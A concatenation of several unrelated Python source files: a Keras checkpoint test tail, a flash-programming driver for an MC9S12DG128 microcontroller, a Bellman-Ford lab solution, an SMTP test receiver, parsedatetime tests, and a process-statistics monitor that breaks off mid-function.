      with open(file_path, 'w') as f:
        f.write('foo bar')
    # The result returned from checkpoint_management.latest_checkpoint takes
    # priority, so even if it was written earlier, we should still return that.
    self.assertEqual(
        keras.callbacks.ModelCheckpoint(None)
        ._get_most_recently_modified_file_matching_pattern(path_pattern),
        ckpt_file_path)
# Standard TensorFlow test entry point.
if __name__ == '__main__':
  test.main()
|
mc9s12dg128.py | from helpers import *
from usbdm import*
from chips.chipinterface import ChipInterface
import threading
from queue import Queue
# Note: DJ64-Flash can only write word-length
# Chip standard Clock is 8Mhz
class MC9S12DG128(ChipInterface):
    """BDM flash/EEPROM programming driver for the Freescale MC9S12DG128.

    Drives the chip's flash and EEPROM command state machines through BDM
    register writes (via the `usbdm` adapter) and uploads a small HC12
    bootloader into on-chip RAM to copy staged data into flash.
    Register addresses and command codes below are the S12 register map as
    used by the original author; the exact write ordering in each method is
    hardware-mandated and must not be reordered.
    """
    NAME = "MC9S12DG128"
    # Banked flash pages are visible in the CPU map through this window.
    ADDRESS_MAPPED_PAGE = 0x8000
    ADDRESS_PROTECTION_FLASH0 = 0xFF0D
    ADDRESS_PROTECTION_FLASH1 = 0xFF0E
    ADDRESS_SECURITY_FLASH = 0xFF0F
    # On-chip RAM window used for bootloader + staged data.
    RAM_START = 0x4000
    RAM_END = 0x5000
    PAGE_LENGTH = 0x4000
    VALUE_SECURITY_UNSECURE = 0xFFFE
    VALUE_SECURITY_SECURE = 0xFFFF
    # Register addresses (flash block, EEPROM block, system init).
    REG_PAGE_MAP= 0x00000030
    REG_FCLKDIV = 0x00000100
    REG_FSEC = 0x00000101
    REG_FCNFG = 0x00000103
    REG_FPROT = 0x00000104
    REG_FSTAT = 0x00000105
    REG_FCMD = 0x00000106
    REG_MODE = 0x0000000B
    REG_INITRM = 0x00000010
    REG_INITRG = 0x00000011
    REG_INITEE = 0x00000012
    REG_ECLKDIV = 0x00000110
    REG_ECNFG = 0x00000113
    REG_EPROT = 0x00000114
    REG_ESTAT = 0x00000115
    REG_ECMD = 0x00000116
    # FSTAT bit masks.
    BITS_FSTAT_ACCER = 0x10
    BITS_FSTAT_PVIOL = 0x20 # protection violation
    BITS_FSTAT_CCIF = 0x40
    BITS_FSTAT_CBEIF = 0x80
    BITS_FSTAT_RESET = 0xFF
    BITS_FSTAT_BLANK = 0x04
    # The EEPROM controller mirrors the flash status-register layout.
    BITS_ESTAT_ACCER = BITS_FSTAT_ACCER
    BITS_ESTAT_PVIOL = BITS_FSTAT_PVIOL
    BITS_ESTAT_CCIF = BITS_FSTAT_CCIF
    BITS_ESTAT_CBEIF = BITS_FSTAT_CBEIF
    BITS_ESTAT_RESET = BITS_FSTAT_RESET
    BITS_ESTAT_BLANK = BITS_FSTAT_BLANK
    BITS_CNFG_BLKSEL = 0x01
    # Flash/EEPROM command codes.
    CMD_BLANK = 0x05
    CMD_PROGRAM = 0x20
    CMD_ERASE_SECTOR = 0x40
    CMD_ERASE_PAGE = 0x41
    def __init__(self,usbdm):
        """Register this chip's page map, part id and clock registers with
        the generic ChipInterface."""
        ChipInterface.__init__(self, usbdm, {0x38:[0x388000,0x38BFFF], 0x39:[0x398000,0x39BFFF], 0x3A:[0x3A8000,0x3ABFFF], 0x3B:[0x3B8000,0x3BBFFF], 0x3E:[0x4000,0x7FFF], 0x3F:[0xC000,0xFFFF], 0x3C:[0x3C8000,0x3CBFFF], 0x3D:[0x3D8000,0x3DBFFF]}, 0x1A, [0x0111, 0x0112, 0x0113, 0x0114, 0x0115])
        # HC12 bootloader machine code. Annotated listing (original):
        # Note: postbytes X=0x00 Y=0x40 SP= 0x80
        # D = counter X = source Y = destination S = value16
        # VAR16_DESTINATION #-6 dest
        # VAR16_TO_FLASH #-4 size
        # VAR16_FLASHED #-2 flashed
        # \xce\x40\x60\ #+3 ldx # load source 4060
        # \xfd\x40\x00\ #+6 ldy # load destination
        # \xcc\x00\x00 #+9 ldd 0
        # \xef\x00 #+11 lds D, X
        # \x6f\x40 #+13 sts D, Y
        # \x18\x0b\x20\x01\x06 #+18 movb #20, $0x106
        # \x18\x0b\x80\x01\x05 #+23 movb #80, $0x105
        # \1f\x01\x05\x40\xfb #+28 loop if CBIF clear in %105
        # \xc3\x00\x02 #+31 addd 2
        # \x08\x08\x02\x02 #+35 inx 2 iny 2
        # \xbc\x40\x02 #+38 cmp D $4002
        # \x26\xe1 #+40 bne to start
        # \x7c\x40\x04 #+43 std $4002
        # \x2a\xfe" #+45 loop
        self.bootloader = [
            b"\xce\x40\x60",
            b"\xfd\x40\x00",
            b"\xcc\x00\x00",
            b"\xef\x00",
            b"\x6f\x40",
            b"\x18\x0b\x20\x01\x06",
            b"\x18\x0b\x80\x01\x05",
            b"\x1f\x01\x05\x40\xfb",
            b"\xc3\x00\x02",
            b"\x08\x08\x02\x02",
            b"\xbc\x40\x02",
            b"\x26\xe1",
            b"\x7c\x40\x04",
            b"\x2a\xfe"]
    def unsecure(self):
        """Unsecure a locked chip by mass-erasing the protection/security
        rows of EEPROM and flash (erases their page contents)."""
        log("Unsecuring chip by erasing protection configuration",level=LOGL_NORMAL,tag = self.NAME)
        self.setup()
        log("Erasing EEPROM",level=LOGL_VERBOSE,tag = self.NAME)
        self.usbdm.writeBdmWord(0x118,0x7ff0) #EADDR HI
        self.usbdm.writeBdmWord(0x11a,0xffff) #EDATA HI
        self.usbdm.writeBdmByte(MC9S12DG128.REG_ECMD, MC9S12DG128.CMD_ERASE_PAGE)
        # Writing CBEIF back to ESTAT launches the queued command.
        self.usbdm.writeBdmByte(MC9S12DG128.REG_ESTAT, MC9S12DG128.BITS_ESTAT_CBEIF)
        self.waitForEEPROM()
        # write 115 30
        # write 115 02
        # write 118 7ff0
        # write 11a ffff
        # write 116 41
        # write 115 80
        #
        log("Erasing Flash",level=LOGL_VERBOSE,tag = self.NAME)
        self.usbdm.writeBdmWord(0x108,0x7ff0) #EADDR HI
        self.usbdm.writeBdmWord(0x10a,0xffff) #EDATA HI
        self.usbdm.writeBdmByte(MC9S12DG128.REG_FCMD, MC9S12DG128.CMD_ERASE_PAGE)
        self.usbdm.writeBdmByte(MC9S12DG128.REG_FSTAT, MC9S12DG128.BITS_FSTAT_CBEIF)
        self.waitForFlash()
        # write 105 30
        # write 102 00
        # write 105 02
        # write 102 10
        # write 108 7ff0
        # write 10a ffff
        # write 106 41
        # write 105 80
        # self.reset()
    def setup(self):
        """Put the MCU in single-chip mode, stop the watchdog, map RAM to
        0x4000 and program the flash/EEPROM clock dividers."""
        log("Setting up registers and flash access",level=LOGL_NORMAL,tag = self.NAME)
        self.usbdm.writeBdmByte(MC9S12DG128.REG_MODE, 0xe0) # Single mode
        self.usbdm.writeBdmByte(0x3C, 0x40) # Stop watchdog
        self.usbdm.writeBdmByte(MC9S12DG128.REG_INITRM, 0x40) # map the ram at 0x4000
        #self.usbdm.writeBdmByte(MC9S12DG128.REG_INITRG, 0x18) # Map registers to 0x1800 - 0x1FFF ?
        #Misc
        self.usbdm.writeBdmByte(0x13, 0x03)
        self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG, 0x00)
        self.usbdm.writeBdmByte(MC9S12DG128.REG_FPROT, 0xFF)
        # 0x2A divides the 8 MHz oscillator down for the flash state machine.
        self.usbdm.writeBdmByte(MC9S12DG128.REG_FCLKDIV, 0x2A)
        self.usbdm.writeBdmByte(MC9S12DG128.REG_FSTAT, 0xFF) # Reset FSTAT
        log("Setting up EEPROM",level=LOGL_VERBOSE,tag = self.NAME)
        self.usbdm.writeBdmByte(MC9S12DG128.REG_ECLKDIV, 0x2A) # ECLK
        self.usbdm.writeBdmByte(MC9S12DG128.REG_ESTAT, 0xff) # EPROT
        self.usbdm.writeBdmByte(MC9S12DG128.REG_INITEE, 0x01) # Enable EEPROM
    # Need to connect to program
    def program(self):
        """Top-level programming flow: unsecure/erase until the device is
        writable (max 3 attempts), then flash the image and verify it."""
        start = time.time()
        if self.memory.gettotalbytes()>0:
            # if can't connect, then we need to unsecure the flash by erasing it's contents
            retries = 0
            while retries <=3:
                if retries >= 3:
                    raise ValueError("Error: Could not prepare flash for programming")
                elif self.connect():
                    self.unsecure()
                    self.erase()
                    retries +=1
                elif self.blankcheck():
                    self.unsecure()
                    self.erase()
                    retries +=1
                else:
                    self.flash()
                    self.verify()
                    break
        log("time: %s s"%str(time.time()-start), level=LOGL_NORMAL,tag = self.NAME)
    # Flash
    def flash(self):
        """Write every non-empty memory page: upload the RAM bootloader once,
        then for each page select the flash block, map the page and feed the
        bootloader data in RAM-sized batches."""
        log("Loading bootloader into RAM",level=LOGL_VERBOSE,tag = self.NAME)
        self.halt()
        self.writememory(MC9S12DG128.RAM_START+6, b"".join(self.bootloader))
        pagenumbers = list(self.ChipPages.keys()) # are the keys
        for pageaddress in pagenumbers:
            if len(self.memorypages[pageaddress]) == 0:
                log("Skipping Page %X"%(pageaddress), level=LOGL_NORMAL,tag = self.NAME)
            else:
                log("Flashing Page %X"%(pageaddress), level=LOGL_NORMAL,tag = self.NAME)
                pagestart = self.ChipPages[pageaddress][0]
                # Select Flash: 0 or 1
                if pageaddress<0x3C:
                    self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG, MC9S12DG128.BITS_CNFG_BLKSEL)
                else:
                    self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG,0x00)
                self.usbdm.writeBdmByte(MC9S12DG128.REG_PAGE_MAP, pageaddress)
                # Flash segments for current page
                for segment in self.memorypages[pageaddress]:
                    written = 0
                    dataleft = segment.getlength()
                    memorystart = segment.address-pagestart
                    maxspace = MC9S12DG128.RAM_END - (MC9S12DG128.RAM_START+0x60) # minus the size of the bootloader + some bytes
                    # Write in small batches, because ram is only 1k
                    while dataleft > 0:
                        sztowrite = 0
                        if dataleft>maxspace:
                            sztowrite = maxspace
                        else:
                            sztowrite = dataleft
                        log("Flashing %d Bytes, Address: %x "%(sztowrite,MC9S12DG128.ADDRESS_MAPPED_PAGE + memorystart + written), level=LOGL_VERBOSE,tag = self.NAME)
                        self.writememory(MC9S12DG128.RAM_START+0x60,segment.data[written:written+sztowrite])
                        # Completion condition: bootloader stores the flashed
                        # byte count (big-endian word) at RAM_START+4.
                        fcondition = sztowrite.to_bytes(2,"big")
                        self.usbdm.writeBdmWord(MC9S12DG128.RAM_START, MC9S12DG128.ADDRESS_MAPPED_PAGE + memorystart + written)
                        # NOTE(review): other writeBdmWord calls pass ints but
                        # this one passes bytes - confirm the usbdm API accepts both.
                        self.usbdm.writeBdmWord(MC9S12DG128.RAM_START+2, fcondition)
                        self.usbdm.writeBdmWord(MC9S12DG128.RAM_START+4, 0)
                        log("Executing bootloader ", level=LOGL_VERBOSE,tag = self.NAME)
                        self.usbdm.writeRegister(0x03, MC9S12DG128.RAM_START+6) # set PC Counter
                        self.usbdm.runTarget() # execute boot loader
                        timeout = time.time() * 1000 + 5000
                        while True:
                            if time.time()*1000<timeout:
                                mem = self.usbdm.readBdmBlock(MC9S12DG128.RAM_START+4,2)
                                #self.readmemory(0x4000, 50)
                                if bytes(mem[1:]) == fcondition:
                                    break
                            else:
                                raise ValueError("Error: flashing timed out")
                        log("Halting bootloader ", level=LOGL_VERBOSE,tag = self.NAME)
                        self.usbdm.haltTarget()
                        written = written + sztowrite
                        dataleft = dataleft - sztowrite
    def erase(self):
        """Page-erase every flash page of the chip."""
        for pageaddress in self.ChipPages:
            log("Erasing Page %X"%(pageaddress), level=LOGL_NORMAL,tag = self.NAME)
            # Select Flash: 0 or 1
            if pageaddress<0x3C:
                self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG, MC9S12DG128.BITS_CNFG_BLKSEL)
            else:
                self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG,0x00)
            self.usbdm.writeBdmByte(MC9S12DG128.REG_PAGE_MAP, pageaddress)
            # A dummy write to the page window latches the erase address.
            self.usbdm.writeBdmWord(MC9S12DG128.ADDRESS_MAPPED_PAGE, 0xFFFF) #
            self.usbdm.writeBdmByte(MC9S12DG128.REG_FCMD, MC9S12DG128.CMD_ERASE_PAGE)
            self.usbdm.writeBdmByte(MC9S12DG128.REG_FSTAT, MC9S12DG128.BITS_FSTAT_CBEIF)
            self.waitForFlash()
    def blankcheck(self):
        """Run the hardware blank-check command.

        :returns: 0 if the device is blank, 1 otherwise.
        """
        status = 0
        log("Blank check ",level=LOGL_VERBOSE,tag = self.NAME)
        self.usbdm.writeBdmWord(MC9S12DG128.ADDRESS_MAPPED_PAGE, 0xFFFF) #
        self.usbdm.writeBdmByte(MC9S12DG128.REG_FCMD, MC9S12DG128.CMD_BLANK)
        self.usbdm.writeBdmByte(MC9S12DG128.REG_FSTAT, MC9S12DG128.BITS_FSTAT_CBEIF)
        readstatus = self.waitForFlash()
        if readstatus & MC9S12DG128.BITS_FSTAT_BLANK == MC9S12DG128.BITS_FSTAT_BLANK:
            log("Device is blank",level=LOGL_NORMAL,tag = self.NAME)
        else:
            status = 1
            log("Device is not blank",level=LOGL_NORMAL,tag = self.NAME)
        return status
    def verify(self):
        """Read back each page and compare it against the staged image on a
        worker thread per page; raise ValueError on any mismatch."""
        threads = []
        errorQueue = Queue()
        for pageaddress in list(self.ChipPages.keys()):
            log("Verifying Page %X"%(pageaddress), level=LOGL_NORMAL,tag = self.NAME)
            # Select Flash: 0 or 1
            if pageaddress<0x3C:
                self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG, MC9S12DG128.BITS_CNFG_BLKSEL)
            else:
                self.usbdm.writeBdmByte(MC9S12DG128.REG_FCNFG,0x00)
            self.usbdm.writeBdmByte(MC9S12DG128.REG_PAGE_MAP, pageaddress)
            flashmemory = self.readmemory(MC9S12DG128.ADDRESS_MAPPED_PAGE, MC9S12DG128.PAGE_LENGTH)
            # compare memory
            thread = threading.Thread(target=comparepagetosegments, args=(self.memorypages[pageaddress],flashmemory,self.ChipPages[pageaddress][0],self.ChipPages[pageaddress][1],errorQueue,))
            threads.append(thread)
            thread.start()
        # Wait for threads to finish
        for t in threads:
            t.join()
        if not errorQueue.empty():
            while not errorQueue.empty():
                result = errorQueue.get()
                log("Memory did not match at %10X expected: %2s read: %2s"%(result[0], result[1], result[2]),level=LOGL_VERBOSE,tag = self.NAME)
            raise ValueError("Error: Contents don't match the file")
        else:
            log("Verified. Contents are good",level=LOGL_NORMAL,tag = self.NAME)
    def waitForEEPROM(self):
        """Poll ESTAT until the EEPROM command completes (CCIF), raising on
        access error, protection violation or a 5 s timeout.

        :returns: the last ESTAT value read.
        """
        timeout = time.time()*1000 + 5000 # 5 seconds
        readstatus = 0x00
        while True:
            if time.time()*1000<timeout:
                time.sleep(0.010)
                readstatus = self.usbdm.readBdmByte(MC9S12DG128.REG_ESTAT)[1]
                if readstatus & MC9S12DG128.BITS_ESTAT_ACCER == MC9S12DG128.BITS_ESTAT_ACCER:
                    raise ValueError("Error: couldn't access EEPROM")
                elif readstatus & MC9S12DG128.BITS_ESTAT_PVIOL == MC9S12DG128.BITS_ESTAT_PVIOL:
                    raise ValueError("Error: protection violation EEPROM")
                elif readstatus & MC9S12DG128.BITS_ESTAT_CCIF == MC9S12DG128.BITS_ESTAT_CCIF:
                    break
            else:
                raise ValueError("Error: command timed out")
        return readstatus
    def waitForFlash(self):
        """Poll FSTAT until the flash command completes (CCIF), raising on
        access error, protection violation or a 5 s timeout.

        :returns: the last FSTAT value read (callers inspect the BLANK bit).
        """
        timeout = time.time()*1000 + 5000 # 5 seconds
        readstatus = 0x00
        while True:
            if time.time()*1000<timeout:
                time.sleep(0.010)
                readstatus = self.usbdm.readBdmByte(MC9S12DG128.REG_FSTAT)[1]
                if readstatus & MC9S12DG128.BITS_FSTAT_ACCER == MC9S12DG128.BITS_FSTAT_ACCER:
                    raise ValueError("Error: couldn't access flash")
                elif readstatus & MC9S12DG128.BITS_FSTAT_PVIOL == MC9S12DG128.BITS_FSTAT_PVIOL:
                    raise ValueError("Error: protection violation flash")
                elif readstatus & MC9S12DG128.BITS_FSTAT_CCIF == MC9S12DG128.BITS_FSTAT_CCIF:
                    break
            else:
                raise ValueError("Error: command timed out")
        return readstatus
|
lab11_d.py | from sys import setrecursionlimit
import threading
# The DFS marking routine recurses once per vertex, so raise the limit.
setrecursionlimit(10 ** 9)
# Give the worker thread a ~192 MiB stack (3 * 64 MiB) for the deep recursion.
threading.stack_size(3 * 67108864)
def main():
    """Single-source shortest paths with negative edges (Bellman-Ford).

    Reads ``path.in``: first line ``n m s`` (vertex count, edge count,
    1-based source), then m lines ``u v w``. Writes to ``path.out`` one
    line per vertex: its distance from s, ``*`` if unreachable, or ``-``
    if the distance is unbounded (reachable through a negative cycle).
    """
    inf = 10 ** 15 + 1  # sentinel larger than any feasible path weight
    #Ford-Bellman algo
    def get_marked(vertex):
        # DFS: mark every vertex reachable from `vertex` (closure over
        # `marked` and `matrix`).
        marked[vertex] = 1
        for current_vertex in matrix[vertex]:
            if not marked[current_vertex]: get_marked(current_vertex)
    file_input, file_output = open('path.in', 'r'), open('path.out','w')
    n, m, s = map(int, file_input.readline().split())
    weight_map, bad_weights, matrix, marked = [inf] * n, [], [[] for _ in range(n)], [0] * n
    weight_map[s - 1] = 0
    all_data = []
    for _ in range(m):
        current = list(map(int, file_input.readline().split()))
        matrix[current[0] - 1].append(current[1] - 1)
        all_data.append([current[0] - 1, current[1] - 1, current[2]])
    file_input.close()  # fix: input handle was previously leaked
    flag = None
    # n+1 rounds: any relaxation in round n+1 proves a negative cycle.
    for _ in range(n + 1):
        bad_weights = []
        flag = None
        for i in range(m):
            current = all_data[i]
            if weight_map[current[0]] != inf:
                if weight_map[current[1]] > weight_map[current[0]] + current[2]:
                    weight_map[current[1]] = weight_map[current[0]] + current[2]
                    flag = current[1]
                    bad_weights.append(current[1])
        if flag is None: break
    # BUGFIX: was `if flag:`, which treats vertex index 0 as "no relaxation"
    # because 0 is falsy, so a negative cycle whose last relaxed vertex was
    # vertex 0 went unreported.
    if flag is not None:
        # Everything reachable from a vertex relaxed in round n+1 has
        # unbounded (minus-infinity) distance.
        for vertex1 in bad_weights:
            if not marked[vertex1]: get_marked(vertex1)
        for j in range(n):
            if marked[j]: weight_map[j] = '-'
    for weight in weight_map:
        if weight != inf: print(weight, file=file_output)
        else: print('*', file=file_output)
    file_output.close()
# Run the solver on a worker thread so it uses the enlarged stack size.
thread = threading.Thread(target=main)
thread.start() |
receiver.py | #!/usr/bin/env python
import sys
import asyncore
import email
import smtpd
import time
from threading import Thread
# Set to False to silence the per-message stderr logging.
DEBUG = True
class CustomSMTPServer(smtpd.SMTPServer):
    # Message counter; `self.num += 1` shadows it per instance on first use.
    num = 0
    def process_message(self, peer, mailfrom, recvtos, data):
        """Handle one inbound message: count it and, in DEBUG, log its body."""
        msg = email.message_from_string(data).get_payload().strip()
        self.num += 1
        if DEBUG:
            print >>sys.stderr, "DEBUG: Received message {0}".format(msg)
    def get_num(self):
        """Return the number of messages received so far."""
        return self.num
class Receiver(object):
    """Runs a CustomSMTPServer with the asyncore loop on a daemon thread."""
    def __init__(self, host, port):
        self.host = host
        self.port = port
    def start(self):
        """Bind the SMTP server and start the asyncore loop in the background."""
        self.smtp = CustomSMTPServer((self.host, self.port), None)
        self.thread = Thread(target = asyncore.loop, kwargs = {'timeout': 1})
        self.thread.daemon = True
        self.thread.start()
    def status(self):
        """Return 'running' or 'stopped' based on the loop thread's state."""
        return "running" if self.thread.is_alive() else "stopped"
    def stop(self):
        """Close the server socket, then wait for the loop thread to exit.
        (Presumably closing the only channel makes asyncore.loop return -
        verify if more channels are ever added.)"""
        self.smtp.close()
        self.thread.join()
    def get_received(self):
        """Return the received-message count as a string."""
        return str(self.smtp.get_num())
if __name__ == "__main__":
recv = Receiver("0.0.0.0", 2255)
recv.start()
print "HELLO - going to sleep but can receive messages"
time.sleep(30)
print "All done"
recv.stop()
|
TestContext.py | # -*- coding: utf-8 -*-
"""
Test pdtContext
"""
import time
import unittest
import parsedatetime as pdt
from parsedatetime.context import pdtContext
class test(unittest.TestCase):
    """Tests for pdtContext accuracy flags returned by Calendar.parse."""
    def setUp(self):
        # Context-style calendar: parse() returns a pdtContext, not a flag int.
        self.cal = pdt.Calendar(version=pdt.VERSION_CONTEXT_STYLE)
        (self.yr, self.mth, self.dy, self.hr, self.mn,
         self.sec, self.wd, self.yd, self.isdst) = time.localtime()
    def testContext(self):
        """Context flags for valid/invalid inputs; flag-style still returns ints."""
        self.assertEqual(self.cal.parse('5 min from now')[1],
                         pdtContext(pdtContext.ACU_MIN | pdtContext.ACU_NOW))
        self.assertEqual(self.cal.parse('5 min from now',
                                        version=pdt.VERSION_FLAG_STYLE)[1], 2)
        self.assertEqual(self.cal.parse('7/11/2015')[1],
                         pdtContext(pdtContext.ACU_YEAR |
                                    pdtContext.ACU_MONTH | pdtContext.ACU_DAY))
        self.assertEqual(self.cal.parse('7/11/2015',
                                        version=pdt.VERSION_FLAG_STYLE)[1], 1)
        # Invalid dates/times parse to an empty context.
        self.assertEqual(self.cal.parse('14/32/2015')[1],
                         pdtContext(0))
        self.assertEqual(self.cal.parse('25:23')[1],
                         pdtContext())
    def testSources(self):
        """Source words (afternoon/morning/night) map to half-day accuracy."""
        self.assertEqual(self.cal.parse('afternoon 5pm')[1],
                         pdtContext(pdtContext.ACU_HALFDAY |
                                    pdtContext.ACU_HOUR))
        self.assertEqual(self.cal.parse('morning')[1],
                         pdtContext(pdtContext.ACU_HALFDAY))
        self.assertEqual(self.cal.parse('night', version=1)[1], 2)
    def testThreadRun(self):
        """evalRanges must be usable from a worker thread."""
        from threading import Thread
        t = Thread(target=lambda: self.cal.evalRanges('4p-6p'))
        # should not throw out AttributeError
        t.start()
if __name__ == "__main__":
unittest.main()
|
watch_proc_stats.py | #!/usr/bin/python3
"""
File: watch_proc_stats.py
Description: Monitors searches for processes with names containing a \
given string and monitors those processes statistics continuously
"""
# pylint: disable=C0325,R0902,R0903,E1101,F0401
# import os
import sys
import time
import logging
import threading
import subprocess
import psutil
import datetime
import queue
import dataset
import datafreeze
LOGGER_NAME = "ProcessesMonitor"
HELP_ARGS_NUMBER = 2
EXPORT_ARGS_NUMBER = 2
MIN_ARGS_COUNT = 2
MAX_ARGS_COUNT = 3
POLL_TIME_ARG_LOCATION = 3
DEFAULT_POLL_TIME = 5
DATABASE_LOCATION = "sqlite:///processes_statistics.db?check_same_thread=False"
class DataExporter(object):
    """Exporting all the data from the tables to csv"""
    def __init__(self, db_location_uri):
        """
        :db_location_uri: Location of the database
        """
        self.logger = logging.getLogger(LOGGER_NAME)
        self.db_location_uri = db_location_uri
    def export(self):
        """
        Exporting the data in the database

        Writes one ``<table_name>.csv`` file per table into the current
        working directory.
        """
        database_connection = dataset.connect(self.db_location_uri)
        for table_name in database_connection.tables:
            file_name = table_name + ".csv"
            # Table names embed the process exec name, which may contain "/";
            # sanitize so the file lands in the current directory.
            file_name = file_name.replace("/", "_")
            self.logger.debug("About to export filename %s", file_name)
            result = database_connection[table_name].all()
            datafreeze.freeze(result, format="csv", filename=file_name)
class DatabaseManager(object):
    """Handles instance of database connection and synchronizes writes to database"""
    def __init__(self, db_location_uri):
        """
        Initialization function
        :db_location_uri: Location of the database
        """
        self.logger = logging.getLogger(LOGGER_NAME)
        self.db_location_uri = db_location_uri
        # Connection and the id of the thread that owns it (SQLAlchemy/SQLite
        # connections are kept thread-local here).
        self.database_connection = None
        self.stored_thread_id = None
        # Single consumer thread draining self.queue; started lazily.
        self.consumer_thread = None
        self.lock = threading.Lock()
        self.queue = queue.Queue()
    def consumer_loop(self):
        """
        Continuously consumes data from the queue and stores it

        Each queue item is ``[table_name, data_item]``; a falsy item
        (``None``, enqueued by clean()) stops the loop.
        """
        self.logger.debug("Starting consumer")
        self.validate_connection()
        data = self.queue.get()
        while data:
            table_name = data[0]
            data_item = data[1]
            table = self.database_connection[table_name]
            table.insert(data_item)
            data = self.queue.get()
        self.disconnect()
        self.logger.debug("Consumer thread about to stop id:%s", threading.get_ident())
        self.logger.debug("Stopping consumer")
    def insert_to_db(self, table_name, data_item):
        """
        Inserts data to a table
        :table_name: Name of the table to insert data to
        :data_item: The data item to insert

        Thread-safe: lazily starts the consumer thread (under the lock) and
        hands the item over via the queue; the actual insert is asynchronous.
        """
        self.logger.debug("In thread:%s", threading.get_ident())
        with self.lock:
            if not self.consumer_thread:
                self.consumer_thread = threading.Thread(name="consumer_thread", target=self.consumer_loop)
                self.consumer_thread.start()
        self.queue.put([table_name, data_item])
    def validate_connection(self):
        """
        Making sure that there is a valid connection to the database registered on this thread
        """
        if self.database_connection:
            # A connection created on another thread is rebuilt on this one.
            if threading.get_ident() != self.stored_thread_id:
                self.disconnect()
                self.connect()
        else:
            self.connect()
    def connect(self):
        """
        Setting a connection to the database
        """
        self.logger.debug("Connecting database")
        self.stored_thread_id = threading.get_ident()
        self.database_connection = dataset.connect(self.db_location_uri)
    def disconnect(self):
        """
        Closing the connection after finishing using it
        """
        # This is a hack to handle SqlAlchemy pooling connections and then being angry that they are not being accessed from the same thread
        self.logger.debug("Disconnecting database")
        self.database_connection.engine.dispose()
        self.database_connection = None
        self.stored_thread_id = None
    def clean(self):
        """
        Cleanup: Stopping the consumer thread
        """
        with self.lock:
            if self.consumer_thread:
                # None is the sentinel that makes consumer_loop exit.
                self.queue.put(None)
                self.consumer_thread.join()
                self.consumer_thread = None
        self.logger.debug("Finished cleanup")
class SingleProcessMonitor(object):
    """Document statistics for a given PID process"""
    def __init__(self, pid_of_process):
        """
        Initialization
        :pid_of_process: The pid of the process
        """
        self.logger = logging.getLogger(LOGGER_NAME)
        self.pid = pid_of_process
        self.creation_timestamp = datetime.datetime.now()
        self.process_info = None
        self.username = None
        self.cmdline = None
        try:
            # BUGFIX: publish self.process_info only after username()/cmdline()
            # succeed. They can also raise NoSuchProcess, and the old code then
            # left process_info set with cmdline still None, making
            # snapshot_process() crash on self.cmdline[0].
            process_info = psutil.Process(pid_of_process)
            self.username = process_info.username()
            self.cmdline = process_info.cmdline()
            self.process_info = process_info
        except psutil.NoSuchProcess:
            self.logger.info("Failed getting initial data for process:%s", pid_of_process)
    def snapshot_process(self):
        """
        Taking a snapshot of processs statistics
        :returns: Dictionary with the process data; empty when the process
                  vanished before tracking could begin. May be partially
                  filled if the process dies mid-snapshot (as before).
        """
        data = {}
        now = datetime.datetime.now()
        if self.process_info:
            try:
                data["timestamp"] = now
                data["time_since_tracking_start"] = (now - self.creation_timestamp).total_seconds()
                data["Username"] = self.username
                data["PID"] = self.pid
                # cmdline can be an empty list (e.g. zombie processes) - guard it.
                data["exec_name"] = self.cmdline[0] if self.cmdline else ""
                data["cmdline"] = " ".join(self.cmdline)
                data["cpu_percent"] = self.process_info.cpu_percent()
                data["total_reserved_memory"] = self.process_info.memory_info()[0]
                data["memory_percent"] = self.process_info.memory_percent()
            except psutil.NoSuchProcess:
                self.logger.info("Couldn't snapshot process with id:%s. cmline:\"%s\"", self.pid, self.cmdline)
        return data
class ProcessesMonitor(object):
    """Monitor processes statistics by a given string"""
    def __init__(self, process_string, database_manager, poll_time=DEFAULT_POLL_TIME):
        self.logger = logging.getLogger(LOGGER_NAME)
        # Substring passed to pgrep to find the processes to track.
        self.process_string = process_string
        self.database_manager = database_manager
        self.poll_time = poll_time
        # One-shot Timer re-armed by _run() to form the polling loop.
        self._timer = None
        self.already_running = False
        self.should_loop = False
        self.current_pids = set()
        # pid -> SingleProcessMonitor for every pid seen so far.
        self.process_monitors = {}
    def loop(self):
        """Used to block execution while monitoring
        """
        while self.should_loop:
            time.sleep(1)
    def snaptshot_all_processes(self):
        """
        Snapshotting all existing processes
        """
        # NOTE(review): method name typo ('snaptshot') kept - it is called
        # by name from _run().
        self.logger.debug("Snapshotting data of: %s", self.current_pids)
        data = {}
        for pid in self.current_pids:
            data[pid] = self.process_monitors[pid].snapshot_process()
        for pid, data_item in data.items():
            if data_item:
                self.database_manager.insert_to_db(str(pid) + "_" + data_item["exec_name"], data_item)
    def _run(self):
        """
        Main loop function for the code execution
        """
        self.logger.debug("Running _run")
        if self.should_loop:
            self.logger.debug("Entered main logic")
            # Get list of existing processes according to the string
            child = subprocess.Popen(["pgrep", self.process_string], stdout=subprocess.PIPE, shell=False)
            result = child.communicate()[0]
            pid_result = set([int(pid) for pid in result.split()])
            new_pids = pid_result - self.current_pids
            self.current_pids = pid_result
            if new_pids:
                self.logger.info("Will start monitoring these new PIDs %s", new_pids)
            # For each new PID create a new SingleProcessMonitor
            for new_pid in new_pids:
                self.logger.debug("Creating SingleProcessMonitor for PID: %s", new_pid)
                self.process_monitors[new_pid] = SingleProcessMonitor(new_pid)
            self.snaptshot_all_processes()
        # Must be at end of _run function to create execution loop
        if self.should_loop:
            self.logger.debug("Calling _run again")
            self._timer = threading.Timer(self.poll_time, self._run)
            self._timer.start()
    def start(self):
        """
        Starts the monitoring of the process
        """
        self.logger.debug("Running start")
        if not self.already_running:
            self.should_loop = True
            self.already_running = True
            self._timer = threading.Timer(self.poll_time, self._run)
            self._timer.start()
    def stop(self):
        """
        Stopping process monitoring
        """
        self.should_loop = False
        self._timer.cancel()
    def clean(self):
        """
        Place holder for a clean function
        """
        if self.already_running:
            self.already_running = False
            self.should_loop = False
            # Timer is a Thread, so join() waits for any in-flight _run().
            self._timer.join()
        self.logger.debug("Finished cleanup")
self.logger.debug("Finished cleanup")
def set_logging(logger_name):
    """Configure process-wide logging and return the logger for `logger_name`.

    basicConfig() installs a root StreamHandler, so the named logger gets
    console output through propagation - no handler is attached to it here.
    :logger_name: name passed to logging.getLogger
    :returns: the configured logging.Logger
    """
    # log_file_location = r"." + os.sep + time.strftime('%Y-%m-%d-%H-%M-%S') + ".log"
    # log_level = logging.INFO
    log_level = logging.DEBUG
